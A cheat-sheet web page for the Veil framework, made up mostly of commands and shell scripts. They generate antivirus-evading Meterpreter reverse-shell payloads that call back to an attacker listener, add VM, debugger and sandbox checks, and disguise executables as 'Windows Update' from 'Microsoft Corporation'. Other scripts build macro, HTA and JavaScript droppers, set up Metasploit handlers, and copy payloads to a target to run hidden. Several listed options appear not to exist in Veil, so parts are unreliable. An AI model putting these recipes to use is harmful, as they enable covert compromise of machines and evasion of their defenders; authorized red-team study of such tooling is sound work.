1337skills.com

Appearance

Veil Cheat Sheet

Overview

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. It's part of the Veil-Framework and focuses on payload generation and encoding to evade detection by antivirus software and endpoint protection systems. Veil supports multiple programming languages and encoding techniques to create undetectable payloads for penetration testing and red team operations.

⚠️ Warning: Only use Veil in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws. This tool is intended for legitimate security testing purposes only.

Installation

Automated Installation

bash
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil

# Run the setup script
sudo ./config/setup.sh --force --silent

# Verify installation
./Veil.py --version

Manual Installation

bash
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git

# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone

# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go

# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil

# Make executable
chmod +x Veil.py

Docker Installation

bash
# Pull Docker image
docker pull mattiasohlsson/veil

# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil

# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc

Kali Linux Installation

bash
# Veil is pre-installed on Kali Linux
veil

# If not installed, install via apt
sudo apt update
sudo apt install veil

# Update to latest version
cd /usr/share/veil
sudo git pull

Basic Usage

Interactive Mode

bash
# Start Veil in interactive mode
./Veil.py

# Or if installed system-wide
veil

# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)

Command Line Mode

bash
# List available payloads
./Veil.py -t Evasion --list-payloads

# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads

# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options

Payload Generation

Python Payloads

bash
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80

# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443

# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444

# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64

C# Payloads

bash
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80

# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443

# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444

# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444

PowerShell Payloads

bash
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80

# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443

# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444

Go Payloads

bash
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80

# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443

# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"

Advanced Evasion Techniques

Encoding and Obfuscation

bash
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64

# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor

# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes

# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor

# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"

Anti-Analysis Techniques

bash
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30

# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check

# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check

# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check

# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check

Custom Payload Options

bash
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico

# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"

# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"

# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"

# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service

Payload Delivery Methods

Executable Generation

bash
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe

# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll

# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service

# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode

# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1

Ordnance (Payload Delivery)

bash
# Start Veil-Ordnance
./Veil.py -t Ordnance

# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444

Integration with Metasploit

Handler Setup

bash
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"

# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"

# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"

Resource Scripts

bash
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF

# Use resource script
msfconsole -r veil_handler.rc

# Multi-handler resource script
cat > multi_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF

Automation Scripts

Batch Payload Generation

bash
#!/bin/bash
# Generate multiple Veil payloads

LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"

mkdir -p "$OUTPUT_DIR"

# Array of payload configurations
declare -a PAYLOADS=(
    "python/meterpreter/rev_tcp:4444:python_tcp"
    "python/meterpreter/rev_http:80:python_http"
    "cs/meterpreter/rev_tcp:4445:cs_tcp"
    "cs/meterpreter/rev_http:8080:cs_http"
    "powershell/meterpreter/rev_tcp:4446:ps_tcp"
    "go/meterpreter/rev_tcp:4447:go_tcp"
)

echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"

for payload_config in "${PAYLOADS[@]}"; do
    IFS=':' read -r payload port name <<< "$payload_config"
    
    echo "[+] Generating $name ($payload:$port)"
    
    ./Veil.py -t Evasion \
        -p "$payload" \
        --ip "$LHOST" \
        --port "$port" \
        --output-dir "$OUTPUT_DIR" \
        --output-name "$name" \
        --force
    
    if [ $? -eq 0 ]; then
        echo "  ✓ Success: $name"
    else
        echo "  ✗ Failed: $name"
    fi
done

echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"

# Generate Metasploit resource script
cat > "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF

echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"

Payload Testing Script

bash
#!/bin/bash
# Test generated payloads against antivirus

PAYLOAD_DIR="$1"
VIRUSTOTAL_API_KEY="your_api_key_here"

if [ -z "$PAYLOAD_DIR" ]; then
    echo "Usage: $0 <payload_directory>"
    exit 1
fi

if [ ! -d "$PAYLOAD_DIR" ]; then
    echo "Error: Directory not found: $PAYLOAD_DIR"
    exit 1
fi

echo "[+] Testing payloads in: $PAYLOAD_DIR"

# Function to upload to VirusTotal
upload_to_vt() {
    local file="$1"
    local filename=$(basename "$file")
    
    echo "[+] Uploading $filename to VirusTotal..."
    
    response=$(curl -s -X POST \
        -H "x-apikey: $VIRUSTOTAL_API_KEY" \
        -F "file=@$file" \
        "https://www.virustotal.com/api/v3/files")
    
    if [ $? -eq 0 ]; then
        scan_id=$(echo "$response" | jq -r '.data.id')
        echo "  Scan ID: $scan_id"
        echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
    else
        echo "  Upload failed"
    fi
}

# Function to check scan results
check_vt_results() {
    local scan_id="$1"
    local filename="$2"
    
    echo "[+] Checking results for $filename..."
    
    response=$(curl -s -X GET \
        -H "x-apikey: $VIRUSTOTAL_API_KEY" \
        "https://www.virustotal.com/api/v3/analyses/$scan_id")
    
    if [ $? -eq 0 ]; then
        status=$(echo "$response" | jq -r '.data.attributes.status')
        if [ "$status" = "completed" ]; then
            stats=$(echo "$response" | jq -r '.data.attributes.stats')
            malicious=$(echo "$stats" | jq -r '.malicious')
            suspicious=$(echo "$stats" | jq -r '.suspicious')
            undetected=$(echo "$stats" | jq -r '.undetected')
            
            echo "  Status: $status"
            echo "  Malicious: $malicious"
            echo "  Suspicious: $suspicious"
            echo "  Undetected: $undetected"
            
            echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
        else
            echo "  Status: $status (still processing)"
        fi
    else
        echo "  Failed to get results"
    fi
}

# Upload all executables
echo "[+] Uploading payloads..."
for file in "$PAYLOAD_DIR"/*.exe; do
    if [ -f "$file" ]; then
        upload_to_vt "$file"
        sleep 15  # Rate limiting
    fi
done

echo "[+] Waiting for scans to complete..."
sleep 300  # Wait 5 minutes

# Check results
if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then
    echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"
    
    while IFS=':' read -r filename scan_id; do
        check_vt_results "$scan_id" "$filename"
        sleep 15  # Rate limiting
    done < "$PAYLOAD_DIR/vt_scans.txt"
    
    echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
    echo "[-] No scans to check"
fi

Payload Deployment Script

bash
#!/bin/bash
# Deploy Veil payloads for testing

PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"

if [ $# -ne 3 ]; then
    echo "Usage: $0 <payload_directory> <target_host> <target_user>"
    exit 1
fi

echo "[+] Deploying payloads to $TARGET_HOST"

# Create remote directory
ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"

# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
    if [ -f "$file" ]; then
        filename=$(basename "$file")
        echo "[+] Copying $filename..."
        
        scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
        
        if [ $? -eq 0 ]; then
            echo "  ✓ Copied successfully"
        else
            echo "  ✗ Copy failed"
        fi
    fi
done

# Create execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to execute payloads
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"

Get-ChildItem -Path $payloadDir -Filter "*.exe" | ForEach-Object {
    $payload = $_.FullName
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    
    Write-Host "[+] Executing: $($_.Name)"
    Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
    
    try {
        Start-Process -FilePath $payload -WindowStyle Hidden
        Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
    }
    catch {
        Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
    }
    
    Start-Sleep -Seconds 5
}
EOF

# Copy execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"

echo "[+] Deployment completed"
echo "[+] To execute payloads on target:"
echo "    ssh $TARGET_USER@$TARGET_HOST"
echo "    powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"

rm /tmp/execute_payloads.ps1

Evasion Testing

Antivirus Testing

bash
# Test against Windows Defender
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender

# Test against multiple AV engines
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all

# Generate report
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report

# Custom AV testing
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"

Sandbox Evasion

bash
# Generate payload with sandbox evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    --sandbox-evasion \
    --sleep 60 \
    --vm-check \
    --debug-check

# Time-based evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    --time-check \
    --execution-delay 300

# Environment checks
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
    --ip 192.168.1.100 \
    --port 4444 \
    --domain-check \
    --process-check \
    --file-check

Troubleshooting

Common Issues

Installation Problems

bash
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip

# Fix Wine issues (for Windows compilation)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32

# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev

# Reinstall Veil
cd Veil
sudo ./config/setup.sh --force

Compilation Errors

bash
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc

# Fix C# compilation
sudo apt install mono-mcs mono-complete

# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin

# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug

Payload Issues

bash
# Test payload generation
./Veil.py -t Evasion --list-payloads | grep meterpreter

# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options

# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe | grep -i meterpreter

# Test payload execution
wine /var/lib/veil/output/compiled/payload.exe

Debugging and Logging

bash
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug

# Check Veil logs
tail -f /var/lib/veil/output/veil.log

# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose

# Check compilation output
cat /var/lib/veil/output/source/payload.cs

Resources

This cheat sheet provides a comprehensive reference for using Veil for payload generation and antivirus evasion. Always ensure you have proper authorization before using this tool in any environment.